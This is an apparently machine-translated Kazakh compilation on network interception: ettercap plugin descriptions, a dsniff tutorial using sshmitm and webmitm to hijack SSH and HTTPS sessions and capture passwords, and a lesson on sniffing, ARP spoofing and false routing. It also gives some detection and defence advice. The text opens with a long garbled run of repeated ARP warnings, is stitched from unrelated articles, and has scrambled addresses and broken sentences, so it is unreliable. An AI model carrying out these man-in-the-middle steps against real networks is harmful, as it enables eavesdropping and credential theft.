( ЕСКЕРТУ ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 1912.168.1.1. arp_cop. _cop: (WA RNING) 192.168.1.35 әрекет етеді be 192.168 .1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.35 болып көрінеді (arp_cop.192.192.168.16.13.) 5 192.1 68.1.1 arp_cop болып көрінеді: ( ЕСКЕРТУ) 192.168 .1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.1. arp_cop. _cop: (ЕСКЕРТУ) 192.1 68.1.35 кейіп танытады be 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.35 болып көрінеді (192.168.1.35) 192.168.1.16.arp_cop. 192.168.1 болып көрінеді.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.1. arp_cop. _cop: (ЕСКЕРТУ) 192.168.1.3 5 сыңай танытады 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.35 болып көрінеді (arp_cop.192.192.168.16.13.) 5 192.168.1.1 arp_cop болып көрінеді : ( ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.1. arp_cop. cop: (ЕСКЕРТУ) 192.168.1.35 болып көрінеді 192. 168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 өзін 192.168.1.1 arp_cop: (WAR2.16.1.15 дейін. 19 2.168.1.1 arp_cop: (ЕСКЕРТУ ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) 192.168.1.1. (ЕСКЕРТУ ) 192.168.1.35 өзін 192.168. .1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: 16.19.19. 92.16 8.1.1 arp_cop: (ЕСКЕРТУ) 192.168. 1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) 192.168.1.1. arp.cop. ЕСКЕРТУ) 192.16 8.1.35 192.168 болып көрінеді .1.1............................

7.2 автоқосу

Ол ARP улану mitm шабуылына қосылғанда жаңа құрбандарды автоматты түрде қосады. Ол жергілікті желіде ARP сұрауларын іздейді және анықталса, тізім TARGET ретінде көрсетілген болса, плагин хостты құрбандар тізіміне қосады. Хост одан arp сұрауы көрінген кезде қосылады.

7.3 chk_у

Ол ettercap ішіндегі arp etch модульдерінің сәтті екенін тексереді. Ол жалған ICMP жаңғырық пакеттерін барлық құрбандарға жібереді, сонымен бірге әрбір құрбан болып көрінеді. Ол тағайындалған орын ретінде біздің MAC мекенжайымызбен ICMP жауабын ала алады, бұл екі нысана арасындағы ілгерілеу сәтті екенін білдіреді. Ол әрбір қосылымның екі жолын да тексереді.

7.4 dns_spoof

Бұл плагин DNS сұрауларын үзеді және жалған (жалған) жауаппен жауап береді. etter.dns файлын өңдеу арқылы плагин қай мекенжайға жауап беретінін таңдауға болады. Плагин A, AAAA, PTR, MX, WINS, SRV және TXT сұрауларын ұстайды. Егер бұл A сұрауы болса, онда атау файлда іздестіріліп, IP мекенжайы қайтарылады (атауда қойылмалы таңбаларды пайдалануға болады).

Бұл AAAA сұрауларына да қатысты.

7.5 find_conn

Хост байланысқысы келетін барлық мақсаттарды көрсету үшін ARP сұрауларын тыңдайтын өте қарапайым плагин. Сондай-ақ ол белгісіз жергілікті желілердегі мекенжайларды табуға көмектеседі.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Жергілікті желіге жіберілген ettercap пакеттерін анықтауға тырысады. Бұл ettercap пайдаланғысы келетін адамды анықтауда пайдалы болуы мүмкін. Оған 100% сенбеңіз, өйткені сынақтар тек белгілі бір реттілікте/идентификаторлық нөмірлерде жұмыс істейді.

7.7 сканерлеуші_уландырғыш

Тізімдегі хосттардың кез келгені мен біздің арамызда біреудің ұрысып жатқанын тексереді. Біріншіден, ол тізімдегі екі хосттың бірдей болуын тексереді Mac мекенжайы. Бұл екінің бірі бізді улап жатыр дегенді білдірсе керек. Ол прокси-arp ортасында көптеген жалған позитивтерді жасай алады. Бұл тексеруді орындау үшін хосттар тізімін жасау керек. Осыдан кейін ол тізімдегі әрбір хостқа icmp жаңғырық пакеттерін жібереді және жауап көзінің Mac мекенжайы осы IP арқылы тізімде сақталған мекенжайдан өзгеше екенін тексереді. Бұл біреу біздің IP-мекен-жайымыз бар болып көрініп, ұсталған пакеттерді бізге жіберіп, осы хостты ұрлап жатқанын білдіруі мүмкін. Сіз бұл белсенді сынақты шабуылсыз режимде іске қоса алмайсыз.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Ол біреудің азғындық режимінде иіскеп (тыңдап) жатқанын анықтауға тырысады. Ол хост тізіміндегі әрбір мақсатқа екі түрлі нашар жасалған arp сұрауын жібереді және жауаптарды күтеді. Егер жауап мақсатты хосттан келсе, мақсатта желілік карта азғындық режимде болуы ықтимал. Ол жалған дабылдарды тудыруы мүмкін. Оны пәрмен жолынан немесе плагиндер мәзірінен іске қосуға болады. Ол arp жауаптарын тыңдайтындықтан, arp сұрауларын жіберу кезінде оларды қолданбасаңыз жақсы болады.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Азғындық режимінде екі желілік картаны сәтті табудың мысалы:

Кеңейту

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы Тыңдау күні: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/252.35/2525:05:00.a. 27ff:feaf:30b9/64 SSL диссекциясы etter.conf файлында жарамды "redir_command_on" сценарийін қажет етеді Ettercap дұрыс жұмыс істемеуі мүмкін. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0 мәніне орнатылмаған. Артықшылықтар EUID 65534 EGID 65534... 33 плагиндер 42 протокол диссекторлары 57 бақыланатын порттар 20388 mac сатушысының саусақ ізі 1716 LuOS белгілі саусақ ізі қызметтері 1718 : ешқандай сценарий көрсетілмеді, іске қосылмайды! Сканерлеу үшін 255 хостты рандомизациялау... 255 хост үшін бүкіл желі маскасын сканерлеу... * |============================ ============= =====================>| 100,00% Хосттар тізіміне 5 хост қосылды... Бірыңғай иістеуді бастау... Тек мәтін интерфейсі іске қосылды... Желідегі анықтама үшін "h" пернесін басыңыз search_promisc плагині іске қосылуда... search_promisc: Болжалды NIC іздеуде... NIC иіскеу мүмкіндігі аз болуы мүмкін : - 192.168.1.36 - 192.168.1.34 Сірә, иіскейтін NIC: - ЖОҚ. Мәтіндік интерфейс жабылуда... ettercap аяқталуда... Луаны тазалау аяқталды! Бірыңғай иіскеу тоқтатылды.

7.9 sslstrip

SSL mitm шабуылы кезінде ettercap нақты SSL сертификатын өзінің сертификатымен ауыстырады. Жалған сертификат жылдам жасалады және барлық өрістер сервер ұсынған нақты сертификатқа сәйкес толтырылады.

(62%)

(56.5%)

(КЕДЕЙ - 0,2%)

Бұл мақалада біз Man-in-the-Middle сияқты шабуылдарды, дәлірек айтқанда әдісті қарастырамыз
Man in Middle шабуылы арқылы SSH және HTTP трафигін қайта бағыттау. Мысықты құйрығынан тартып алмай, іске кірісейік.

Ортадағы адам (қысқаша MitM, орыс тілінен қарапайым - «делдалдық шабуыл» немесе «адам
ортасында») - ақпаратты ұстап алу үшін екі машина арасындағы трафикті қайта бағыттауға негізделген шабуыл түрі - оны әрі қарай зерттеу, жою немесе өзгерту. Сонымен, бізге бірінші қажет нәрсе - dsniff пакеті (сіз мына жерден пакетке сілтемені көресіз мақаланың соңы).Неліктен Иә, себебі бұл пакетте келесі қауіпсіздік схемасын айналып өтуге болатын sshmitm (SSH трафигін қайта бағыттау) және httpmitm (HTTP трафигін қайта бағыттау) қоса алғанда, барлық қажетті утилиталар бар: сіз білетіндей, протоколдар бар. деректерді шифрлау өте жақсы -олар «қауіпсіз» (шифрлау көмектеседі :)) және желілік деңгейдің «жоғарғы жағында» шабуылдарды жасауға мүмкіндік бермейді.Шифрлау кілті хакерге белгісіз - деректерді шифрлау мүмкін емес және пәрменді де кірістіріңіз.Бәрі жақсы сияқты, бірақ бұл жерде
dsniff бумасындағы MitM шабуыл бағдарламалары (sshmitm және httpmitm) айналып өтуге қабілетті болғандықтан бұл жүйеқауіпсіздік (сіз бәрін дерлік айналып өтуге болады). Мұның бәрі келесі принцип бойынша жүзеге асырылады:
аралық хост клиенттен сұрауды алады, оған сервер екенін «айтып», содан кейін нақты серверге қосылады.
Бізге қажет екінші нәрсе - түзу қолдар, төртінші - ең бастысы - тілек және, әрине, құрбан, яғни біз шабуыл жасайтын компьютер.

SSH трафигін қайта бағыттау

Құралдарды дайындағаннан кейін сіз ненің не екенін және неге екенін түсіндіңіз :). Sshmitm алыңыз - енді біз SSH трафигін қайта бағыттаймыз (теориялық бөлімде түсінбегендердің барлығы - жоғарыда оқыңыз)
оны пайдалана отырып, бүгінгі күнгі ПҚИ кемшіліктерін пайдалана отырып (ашық кілттік инфрақұрылым – негізгі басқару схемасы негізінде
асимметриялық криптография әдістері). Синтаксисті қарастырайық
sshmitm:

sshmitm [-d] [-I] [-p порт] хост

D
отладка шығаруға рұқсат беру (яғни, кеңейтілген режим)

I
сеансты ұрлау

P порты
тыңдау порты

хост
сеанстары ұсталатын қашықтағы хосттың мекенжайы

порт
қашықтағы хосттағы порт

Барлығы қарапайым және дәмді болып көрінеді - күрделі ештеңе жоқ :). Шабуылды жүзеге асыруды бастайық!

# sshmitm server.target.gov // SSH серверіңізді көрсетіңіз
sshmitm: server.target.gov серверіне өту

Бізде нақты SSH кілті болмағандықтан, шабуыл жасалған команданың аудармашысы
хост кілтін тексеру сұрауын көрсетеді, барлығы келесідей болады:

clientmachine$ server.target.gov
@ЕСКЕРТУ: ҚАШЫҚТАН ХОСТ ИДЕНТИФИКАЦИЯСЫ ӨЗГЕРТТІ! @
БІРЕУ ЖҰМЫС ЖАСАУЫ МҮМКІН!
Дәл қазір біреу сізді тыңдауы мүмкін (ортадағы адам шабуылы)!
Сондай-ақ, RSA хост кілті жаңа ғана өзгертілген болуы мүмкін.
Жүйе әкімшісіне хабарласыңыз.

Содан кейін пайдаланушы қосылу немесе қосылмау туралы шешім қабылдайды. Егер иә болса, онда біз SSH сеансын толық басқарамыз.
БІРАҚ! Егер пайдаланушы бұл көлікке ешқашан қосылмаған болса, келесі хабарлама көрсетілуі мүмкін:

"server.target.gov" хостының түпнұсқалығын анықтау мүмкін емес
RSA кілтінің саусақ ізі
бла:бла:бла;бла;бла.......
Қосылуды жалғастырғыңыз келетініне сенімдісіз бе (иә/жоқ)?

Мұнда пайдаланушының екі таңдауы бар - қосылу немесе қосылмау. Егер иә болса, біз сессияны тоқтаттық, егер жоқ болса, өкінішке орай... :(.
Тұтастай алғанда, егер пайдаланушы қосылса, шабуыл сәтті болды және sshmitm, өз кезегінде, барлық өтулер мен логиндерді жазды және өте оқылатын түрде :)
Әрине, бұл жалғыз SSH сеансын ұстағыш емес, бірақ сіз онымен танысқаннан кейін басқасын оңай меңгере аласыз :)

HTTP трафигі қайта бағытталуда

Енді біз HTTP трафигін қайта бағыттаймыз. Тағы да бізге бұрын таңдалған құрал қажет болады: httpmitm, ол 80 (HTTP -) және 443 (HTTPS -) порттарын тыңдайды, WEB сұрауларын тоқтатады, содан кейін серверге қосылып, сұраныстарды клиенттік компьютерге жібереді. Бағдарлама сонымен қатар OpenSSL көмегімен SSL кілттері мен SSL сертификаттарын жасайды. Содан кейін, тырысқаннан кейін
сайтқа (target.gov) қосылса, браузер SSL сертификатын тексереді. Сертификаттар сәйкес келмейтіндіктен, пайдаланушы браузері бұл туралы ескертеді
қате SSL сертификаты. Шабуылшының көзқарасы бойынша ол келесідей болады:

#webmitm -d
webmitm: мөлдір трансляция
webmitm: жаңа қосылым
[сілтеме]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[нұсқасын] АЛУ
Байланыс: [түрі]
Хост: www.target.gov
Пайдаланушы-агент: [жүйе, шолғыш туралы ақпарат]
[және т.б., т.б.]
Cookie: [cookie файлдары]

Сырттан бәрі осылай көрінеді -
SSL қосылымы үзіліп, шифрланбаған деректерді түсіреді.

Қорытынды

Бұл мақалада біз Man in the Middle шабуылы арқылы SSH және HTTP трафигін қайта бағыттауды қарастырдық - анық, егжей-тегжейлі, қысқаша. Басқа HTTP және SSH қайта бағыттағыштары
Егер сіз бұларды да меңгерген болсаңыз, MitM көмегімен трафикті тез меңгересіз :)). Егер бірдеңе түсініксіз болса, онда...

Желі арқылы деректерді ұстап алу - қашықтағы компьютерлік құрылғыдан кез келген ақпаратты алу. Ол пайдаланушының жеке ақпаратынан, оның хабарламаларынан және веб-сайтқа кіру жазбаларынан тұруы мүмкін. Деректерді түсіру шпиондық бағдарлама немесе желілік снайферлер көмегімен жүзеге асырылуы мүмкін.

Шпиондық бағдарлама – бұл белгілі бір жұмыс станциясынан немесе құрылғыдан желі арқылы берілетін барлық ақпаратты жаза алатын арнайы бағдарламалық құрал.

Снайфтер - желі арқылы өтетін трафикті ұстайтын және талдайтын бағдарлама немесе компьютерлік технология. Снайфтер веб-сеансқа қосылуға және компьютер иесінің атынан әртүрлі әрекеттерді орындауға мүмкіндік береді.

Егер ақпарат нақты уақытта берілмесе, шпиондық бағдарламаақпаратты қарау мен талдауды ыңғайлы ететін есептерді жасау.

Желіні ұстау заңды немесе заңсыз жүзеге асырылуы мүмкін. Ақпаратты алудың заңдылығын бекітетін негізгі құжат Киберқылмыс туралы конвенция болып табылады. Ол 2001 жылы Венгрияда құрылған. Заң талаптары әр штатта аздап өзгеруі мүмкін, бірақ негізгі хабар барлық елдер үшін бірдей.

Желі арқылы мәліметтерді ұстап алудың жіктелуі және әдістері

Жоғарыда айтылғандарға сәйкес желі арқылы ақпаратты ұстауды екі түрге бөлуге болады: рұқсат етілген және рұқсат етілмеген.

Рұқсат етілген деректерді алу корпоративтік ақпаратты қорғаудан ұлттық қауіпсіздікті қамтамасыз етуге дейін әртүрлі мақсаттарда жүзеге асырылады. Мұндай операцияны жасаудың негіздері заңнамамен, арнаулы қызметтермен, құқық қорғау органдарының қызметкерлерімен және мамандарымен айқындалады. әкімшілік ұйымдаржәне компанияның қауіпсіздік қызметтері.

Деректерді ұстап алуды жүзеге асырудың халықаралық стандарттары бар. Еуропалық телекоммуникация стандарттары институты ақпаратты ұстап алу негізделген бірқатар техникалық процестерді (ETSI ES 201 158 «Телекоммуникациялық қауіпсіздік; Заңды ұстап алу (LI); Желілік функцияларға қойылатын талаптар») үйлестіре алды. Нәтижесінде құпия қызмет мамандары мен желі әкімшілеріне желіден заңды түрде деректерді алуға көмектесетін жүйелік архитектура әзірленді. Желі арқылы деректерді ұстап алуды жүзеге асыруға арналған әзірленген құрылым сымды және сымсыз жүйелердауыстық қоңыраулар, сондай-ақ пошта арқылы хат алмасу, IP арқылы дауыстық хабарламаларды беру, SMS арқылы ақпарат алмасу.

Желі арқылы деректерді рұқсатсыз ұстауды құпия мәліметтерді, парольдерді, корпоративтік құпияларды, желідегі компьютерлік машиналардың мекенжайларын және т.б. иемденгісі келетін шабуылдаушылар жүзеге асырады. Өз мақсаттарына жету үшін хакерлер әдетте желілік трафик анализаторын – снайферді пайдаланады. Бұл бағдарламанемесе аппараттық-бағдарламалық құрал алаяққа жәбірленуші пайдаланушы қосылған желідегі ақпаратты, соның ішінде сертификатты бұрмалау арқылы шифрланған SSL трафигін ұстап алу және талдау мүмкіндігін береді. Қозғалыс деректерін әртүрлі жолдармен алуға болады:

желі интерфейсін тыңдау,
тосқауыл құрылғысын арнаның үзілуіне қосу,
трафик тармағын құру және оны снайперге көшіру,
шабуыл жасау арқылы.

Сондай-ақ желілік өзара әрекеттесулерге қол сұғуға және деректерді өзгертуге мүмкіндік беретін маңызды ақпаратты ұстаудың күрделірек технологиялары бар. Осындай әдістердің бірі жалған ARP сұраулары болып табылады. Әдістің мәні - жәбірленушінің компьютері мен шабуылдаушы құрылғысы арасындағы IP мекенжайларын ауыстыру. Желі арқылы деректерді ұстап алудың тағы бір әдісі - жалған маршруттау. Ол желілік маршрутизатордың IP мекенжайын өзіңіздің мекенжайыңызбен ауыстыруды қамтиды. Егер киберқылмыскер жәбірленуші орналасқан жергілікті желінің қалай ұйымдастырылғанын білсе, онда ол пайдаланушының машинасынан оның IP мекенжайына ақпарат алуды оңай ұйымдастыра алады. TCP қосылымын түсіру де қызмет етеді тиімді түрдедеректерді ұстап алу. Шабуылдаушы жәбірленушінің компьютеріне TCP пакеттерін жасау және жіберу арқылы байланыс сеансын үзеді. Әрі қарай, байланыс сеансы клиенттің орнына қалпына келтіріледі, ұсталады және қылмыскер жалғастырады.

Әсер ету объектісі

Желі арқылы деректерді ұстап алу объектілері мемлекеттік органдар, өнеркәсіптік кәсіпорындар, коммерциялық құрылымдар және қарапайым пайдаланушылар болуы мүмкін. Ұйымда немесе бизнес компанияда желі инфрақұрылымын қорғау үшін ақпаратты түсіруге болады. Барлау органдары мен құқық қорғау органдары қойылған міндетке байланысты әртүрлі иелерден берілетін ақпаратты жаппай ұстауды жүзеге асыра алады.

Егер киберқылмыскерлер туралы айтатын болсақ, онда кез келген пайдаланушы немесе ұйым желі арқылы берілетін деректерді алу үшін ықпал ету объектісіне айналуы мүмкін. Рұқсат етілген қол жеткізу кезінде алынған ақпараттың ақпараттық бөлігі маңызды, ал шабуылдаушыны басып алу үшін пайдалануға болатын деректер көбірек қызықтырады. қолма-қол ақшаменнемесе кейіннен сату үшін құнды ақпарат.

Көбінесе қоғамдық желіге қосылатын пайдаланушылар, мысалы, хотспот бар кафеде, киберқылмыскерлердің ақпаратты ұстап алуының құрбаны болады. Wi-Fi қатынасы. Шабуылдаушы снайфер арқылы веб-сеансқа қосылып, деректерді ауыстырады және жеке ақпаратты ұрлайды. Бұл қалай болатыны туралы мақалада оқыңыз.

Қауіптің көзі

Кәсіпорындар мен ұйымдардағы ақпаратты рұқсат етілген ұстауды жалпыға ортақ желілік инфрақұрылым операторлары жүзеге асырады. Олардың қызметі жеке деректерді, коммерциялық құпияларды және т.б. қорғауға бағытталған маңызды ақпарат. Заңды түрде хабарламалар мен файлдардың берілуін азаматтар мен мемлекеттің қауіпсіздігін қамтамасыз ету үшін арнайы қызметтер, құқық қорғау органдары және әртүрлі мемлекеттік органдар бақылай алады.

Қылмыскерлер деректерді заңсыз ұстаумен айналысады. Киберқылмыскердің құрбаны болмас үшін сарапшылардың кейбір ұсыныстарын орындау керек. Мысалы, жалпыға ортақ желілерге қосылатын жерлерде құпия деректерді авторизациялауды және тасымалдауды талап ететін әрекеттерді орындамау керек. Шифрлауы бар желілерді таңдау қауіпсіз, ал одан да жақсысы - жеке 3G және LTE модемдерін пайдалану. Жеке деректерді тасымалдау кезінде оны HTTPS протоколы немесе жеке VPN туннелі арқылы шифрлау ұсынылады.

Сіз криптография және антиснайферлер көмегімен компьютеріңізді желілік трафикті ұстап қалудан қорғай аласыз; Сымсыз желіге қатынаудан гөрі теру тәуекелдерді азайтады.

Бұл сабақ желілік пакеттерді ұстауға негізделген желіні бұзу технологияларын сипаттайды. Хакерлер мұндай технологияларды құнды ақпаратты ұрлау үшін желілік трафикті тыңдау, «ортадағы адам» шабуылы мақсатында деректерді ұстауды ұйымдастыру, TCP қосылымдарын ұстау, айталық, деректердің спуфингіне рұқсат беру және т.б. , қызықты әрекеттері кем емес. Өкінішке орай, бұл шабуылдардың көпшілігі тек Unix желілері үшін жүзеге асырылады, олар үшін хакерлер екеуін де пайдалана алады. арнайы утилиталар, және Unix жүйелік құралдары. Windows желілерін, шамасы, хакерлер елемеді және біз желілік пакеттерді тривиальды тыңдауға арналған бағдарламаларды анықтау үшін деректерді ұстау құралдарының сипаттамасын шектеуге мәжбүрміз. Дегенмен, мұндай шабуылдардың, әсіресе анти-хакерлер үшін, кем дегенде, теориялық сипаттамасын елемеуге болмайды, өйткені қолданылатын хакерлік технологияларды білу көптеген қиындықтардың алдын алуға көмектеседі.

Желіні иіскеу

Әдетте Ethernet желілерін иіскеу үшін қолданылады. желілік карталартыңдау режиміне ауыстырылды. Тыңдау Ethernet желілері sniffer бағдарламасымен жұмыс істейтін компьютерді желі сегментіне қосуды талап етеді, содан кейін осы желі сегментіндегі компьютерлер жіберген және қабылдаған барлық желілік трафик хакерге қолжетімді болады. Сымсыз желі делдалдарын пайдаланатын радио желілерінен трафикті ұстап тұру одан да оңай - бұл жағдайда кабельге қосылу үшін орын іздеудің қажеті жоқ. Немесе шабуылдаушы компьютерді Интернет-серверге қосатын телефон желісіне қосыла алады, бұл үшін ыңғайлы орын таба алады (телефон желілері әдетте жертөлелерде және басқа сирек баратын жерлерде ешқандай қорғаныссыз тартылады).

Иістеу технологиясын көрсету үшін біз көптеген веб-сайттардан табуға болатын өте танымал SpyNet иіскегіш бағдарламасын қолданамыз. SpyNet бағдарламасының ресми веб-сайты http://members.xoom.com/layrentiu2/ мекенжайында орналасқан, онда бағдарламаның демо нұсқасын жүктеп алуға болады.

SpyNet бағдарламасы екі компоненттен тұрады - CaptureNet және PipeNet. CaptureNet бағдарламасы желі деңгейінде Ethernet желісі арқылы берілетін пакеттерді ұстауға мүмкіндік береді, яғни. Ethernet фреймдер түрінде. PipeNet бағдарламалық құралы Ethernet кадрларын қолданбалы деңгей пакеттеріне жинауға мүмкіндік береді, мысалы, хабарламаларды қалпына келтіреді. Электрондық пошта, HTTP протоколының хабарламалары (веб-сервермен ақпарат алмасу) және басқа функцияларды орындайды.

Өкінішке орай, SpyNet демонстрациясында PipeNet мүмкіндіктері HTTP пакеттерін құрастыру демонстрациясымен шектелген, сондықтан біз SpyNet-ті толық көрсете алмаймыз. Дегенмен, біз SpyNet желісінің иістеу мүмкіндіктерін тәжірибелік желіні пайдаланып мысал ретінде көрсетеміз. мәтіндік файл Sword-2000 хостынан Alex-Z хостына әдеттегідей Windows Explorer. Сонымен бірге, A1ex-1 компьютерінде біз CaptureNet бағдарламасын іске қосамыз, ол жіберілетін пакеттерді ұстап алады және Ethernet фреймдерінде жіберілген файлдың мазмұнын оқуға мүмкіндік береді. Суретте. 1 secret.txt файлындағы құпия хабарламаның мәтінін көрсетеді; біз бұл мәтінді түсірілген Ethernet фреймдерінен табуға тырысамыз.

Күріш. 1. Блокнот терезесіндегі құпия хабарламаның мәтіні

Ethernet кадрларын түсіру үшін мына қадамдарды орындаңыз:

Alex-Z компьютерінде CaptureNet бағдарламасын іске қосыңыз. Бағдарламаның көрсетілетін жұмыс терезесінде мәзір командасын таңдаңыз Capture * Start (Capture * Start) және желілік кадрларды ұстап алу процесін бастаңыз.

Windows Explorer арқылы security.txt файлын Sword-2000 компьютерінен A1ex-3 файлына көшіріңіз.

secret.txt файлын тасымалдағаннан кейін Түсіру * Тоқтату мәзірінің пәрменін таңдап, түсіру процесін тоқтатыңыз.

Түсірілген Ethernet кадрлары CaptureNet бағдарламасының терезесінің оң жағында пайда болады (2-сурет), жоғарғы тізімдегі әрбір жол Ethernet жақтауын және тізімнің астында таңдалған кадрдың мазмұнын көрсетеді.

Күріш. 2. Ethernet жақтауы құпия хабарлама мәтінін қамтиды

Ұсталған кадрлар тізімін қарап шығып, біз жіберген мәтінді қамтитынын оңай таба аламыз. Бұл өте үлкен құпия (Бұл өте үлкен құпия).

Бұл барлық ұсталған желі трафигі жазылған ең қарапайым мысал екенін атап өтеміз. CaptureNet арнайы протоколдар мен белгілі бір хост порттарына жіберілген пакеттерді ұстауға, белгілі бір мазмұны бар хабарларды таңдауға және түсірілген деректерді файлға жинақтауға мүмкіндік береді. Мұндай әрекеттерді орындау техникасы қарапайым және оны SpyNet бағдарламасының анықтамалық жүйесін пайдаланып үйренуге болады.

Қарапайым желіні тыңдаудан басқа, хакерлер деректерді ұстаудың неғұрлым күрделі құралдарына қол жеткізе алады. Төменде теориялық тұрғыдан болса да, мұндай әдістерге қысқаша шолу жасалады. Себебі Windows желілері үшін деректерді ұстап алу шабуылдарын практикалық жүзеге асыру өте шектеулі, ал ұстап қалу шабуылдарына арналған сенімді утилиталар жиынтығы өте нашар.

Желілік трафикті ұстау әдістері

Жоғарыдағы CaptureNet сияқты желілік анализатор бағдарламаларын пайдаланып желіні иіскеу деректерді ұстаудың бірінші, ең қарапайым жолы болып табылады. SpyNet-тен басқа, желілік белсенділікті талдау, желілерді диагностикалау, көрсетілген критерийлер бойынша трафикті таңдау және желіні басқарудың басқа тапсырмалары үшін бастапқыда әзірленген желіні анықтау үшін көптеген құралдар қолданылады. Мұндай бағдарламаның мысалы tcpdump (http://www.tcpdump.org), ол желілік трафикті кейінгі талдау үшін арнайы журналға жазуға мүмкіндік береді.

Желіні тыңдаудан қорғау үшін арнайы бағдарламалар пайдаланылады, мысалы, AntiSniff (http://www.securitysoftwaretech.com/antisniff), олар желідегі желілік трафикті тыңдайтын компьютерлерді анықтауға қабілетті. Өз мәселелерін шешу үшін антисниферлік бағдарламалар желіде тыңдау құрылғыларының бар екендігінің арнайы белгісін пайдаланады - снайферлік компьютердің желілік картасы арнайы тыңдау режимінде болуы керек. Тыңдау режимінде желілік компьютерлер сыналатын хостқа жіберілген IP датаграммаларына ерекше түрде әрекет етеді. Мысалы, тыңдаушы хосттар әдетте хост мекенжайына жіберілген датаграммаларды ғана емес, барлық кіріс трафикті өңдейді. AntiSniff тани алатын күдікті хост әрекетін көрсететін басқа белгілер бар.

Жалған ARP сұраулары

Екі А және В хосттары арасындағы желілік өзара әрекеттесу процесін ұстап алу және қабылдау үшін шабуылдаушы А және В хосттарына жалған ARP (мекенжайды шешу хаттамасы) хабарламаларын жіберу арқылы өзара әрекеттесетін хосттардың IP мекенжайларын өзінің IP мекенжайымен алмастыра алады. ARP хаттамасымен хосттың желілік картасына қатқыл кодталған машина адресіне (MAC мекенжайы) хосттың IP мекенжайын шешу (түрлендіру) тәртібін сипаттайтын D қосымшасында танысуға болады. А және В хосттары арасындағы желілік коммуникацияларды тоқтату үшін хакер ARP қалай пайдалана алатынын көрейік.

Шабуылдаушы A және B хосттарының MAC мекенжайларын анықтайды, мысалы, W2RK бумасындағы nbtstat пәрменін пайдаланады.

Шабуылдаушы A және B хосттарының анықталған MAC мекенжайларына хабарламалар жібереді, олар компьютерлердің MAC мекенжайларына хосттардың IP мекенжайларын шешуге арналған сұрауларға жалған ARP жауаптары болып табылады. А хостына В хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні туралы хабарланады; В хостына А хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына да сәйкес келетіні туралы хабарланады.

А және В хосттары қабылданған MAC мекенжайларын өздерінің ARP кэштерінде сақтайды, содан кейін оларды бір-біріне хабарламалар жіберу үшін пайдаланады. А және В IP мекенжайлары шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіндіктен, А және В хосттары өз хабарламаларымен кез келген нәрсені жасай алатын делдал арқылы байланысады.

Мұндай шабуылдардан қорғау үшін желі әкімшілері желілік компьютерлерінің MAC мекенжайлары мен IP мекенжайлары арасындағы сәйкестік кестесі бар дерекқорды жүргізуі керек. Әрі қарай, арнайы пайдалану бағдарламалық қамтамасыз етуМысалы, arpwatch утилиталары (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) желіні мерзімді түрде тексеріп, сәйкессіздіктерді анықтай алады.

UNIX желілерінде жалған ARP сұрау шабуылының бұл түрі arpredirect сияқты желілік трафикті бақылауға және басқаруға арналған жүйелік утилиталарды қолдану арқылы жүзеге асырылуы мүмкін. Өкінішке орай, мұндай сенімді утилиталар Windows 2000/XP желілерінде жүзеге асырылмаған сияқты. Мысалы, NTsecurity веб-сайтында (http://www.ntsecurity.nu) желілік хосттар арасындағы трафикті қайта бағыттау құралы ретінде ұсынылған GrabitAII утилитасын жүктеп алуға болады. Дегенмен, GrabitAII утилитасының функционалдығын негізгі тексеру оның функцияларын жүзеге асыруда толық табыс әлі де алыс екенін көрсетеді.

Жалған маршруттау

Жалған маршруттауды орындау үшін шабуылдаушы А хосты орналасқан жергілікті желінің ұйымдастырылуы туралы кейбір мәліметтерді білуі керек, атап айтқанда, трафик А хостынан В хостына жіберілетін маршрутизатордың IP мекенжайын білуі керек. Бұны біле отырып, шабуылдаушы. IP датаграммасын жасайды, онда IP -жіберушінің мекенжайы маршрутизатордың IP мекенжайы ретінде анықталады, ал алушы А хосты болып табылады. Сондай-ақ, датаграммаға жаңа маршрутизатордың мекенжай өрісі орнатылған ICMP Redirect хабарламасы кіреді. Шабуылдаушы компьютерінің IP мекенжайы. Мұндай хабарламаны алғаннан кейін А хосты барлық хабарламаларды шабуылдаушы компьютерінің IP мекенжайына жібереді.

